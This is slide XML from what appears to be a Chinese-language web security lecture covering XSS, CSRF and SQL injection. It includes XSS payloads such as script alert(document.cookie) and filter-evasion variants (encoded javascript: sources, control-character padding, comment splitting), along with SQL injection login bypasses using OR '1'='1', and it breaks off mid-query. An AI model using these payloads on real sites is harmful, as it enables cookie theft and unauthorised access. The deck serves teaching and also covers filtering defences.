              <a:t>3Cscript%3E+alert%28document.cookie%29%3B%3C%2Fscript%3E&amp;x=51&amp;y=6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16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 XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>长什么样子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333217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&lt;IMG SRC=&amp;#x006a;&amp;#x0061;&amp;#x0076;&amp;#x0061;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&amp;#x0073;&amp;#x0063;&amp;#x0072;&amp;#x0069;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&amp;#x0070;&amp;#x0074;&amp;#x003a;&amp;#x0061;&amp;#x006c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&amp;#x0065;&amp;#x0072;&amp;#x0074;&amp;#x0028;&amp;#x0027;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&amp;#x0078;&amp;#x0073;&amp;#x0073;&amp;#x0027;&amp;#x0029;&amp;#x003b;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上面代码等同于</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;IMG SRC="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>javascript:alert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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>');"&gt;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91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43608" y="1628800"/>
            <a:ext cx="5904656" cy="424847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跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站请求伪造攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF)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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击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跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(XSS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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL 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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Q&amp;A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7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/>
              <a:t>代码插入方式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1012527"/>
            <a:ext cx="91440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/>
              <a:t>过滤绕过方式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7504" y="1052736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、用控制字符的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>码填充</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>　　比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&lt;IMG SRC="&amp;#15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>；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：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>alert('XSS');"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，如果你熟悉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>码，你应该 知道系统控制字符一共是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>33</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>个，这里去掉一个头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&amp;#00(null)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>和一个尾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&amp;#127(del)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>个字符 均可以顺利插入代码头部，对过滤系统进行混淆，并且不影响原代码执行，而且你依然可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>代码插入 方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>方案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>7"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>进行编码的任意转换。七种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&amp;#9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、换行符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&amp;#10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、回车符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&amp;#13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>可以插到代码任何地方。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/>
              <a:t>、插入混淆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>属性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>　　当我们进行一般的文字录入时会发现，并不是所有带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaSceipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>这样的字符都会被过滤掉。而是只有在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标签内的特殊字符会被滤掉，这使得我们有了令一套绕过措施，在插入代码的属性前面插 入另一混淆属性，并在该属性中插入让过滤系统误以为是标签结束符的字符，从而让过滤系统认为执行代码在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标签的外面。比如：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&lt;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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&gt;" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>="[code]"&gt;            //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>插入混淆的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属 性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&lt;IMG """&gt;&lt;SCRIPT&gt;[code]&lt;/SCRIPT&gt;"&gt;            //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>插入混 淆的双引号及 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>符号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&lt;SCRIPT a="&gt;" SRC="xss.js"&gt;&lt;/SCRIPT&gt;            //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>插入混淆的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>属性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、用注释符分割</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>　　由于浏览器会忽略掉每种代码的注释符，因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>代码的正常运行。比如：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 style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>xss:expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>/*XSS*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>([code])"&gt;            //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的注释符号 为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，其中的内容会被忽略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&lt;style&gt;@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>\port'\ja\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>vasc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>("XSS")';&lt;/style&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>中忽略的符号还有“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>\”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>/*&lt;A STYLE='no\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>xss:noxss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>("*//*");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>:&amp;#101;x&amp;#x2F;*XSS*//*/*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>pression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> (alert("XSS"))'&gt;            //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>注释混淆后的样子</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;[code]//-- &gt;&lt;/script&gt;            //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的注释符为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>&lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>注释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/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38987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 XSS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43752" y="2708920"/>
            <a:ext cx="26564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演示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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8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62919" y="1700808"/>
            <a:ext cx="69847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跨站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>脚本的三大流派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反射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss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存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS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2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/>
              <a:t>防御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196752"/>
            <a:ext cx="806489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过虑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输入参数过虑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输出参数过虑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常见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过虑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特殊符号过虑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转义符号过虑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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关键字严格过虑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html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关键字严格过虑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输入参数按类型严格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输出参数按类型严格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不使用类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尽量让用户只输入正常词汇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Xss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和感冒一样难对付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89217"/>
            <a:ext cx="3456384" cy="235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290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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>. SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>注入是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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</a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表单提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或输入域名或页面请求的查询字符串，最终达到欺骗服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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</a:rPr>
              <a:t>命令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b="1" dirty="0" smtClean="0"/>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>可以做什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>让数据库执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>命令，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>删库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"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21088"/>
            <a:ext cx="41529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6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205458"/>
            <a:ext cx="871296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注入实例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM users WHERE 'username' = '$USER' AND 'password'='$PASS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM users WHERE 'username' = 'bob' AND 'password' = '1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'username' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'admin' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and `password` = 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hi' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'username'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>`password`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = 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hi'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/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'username' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
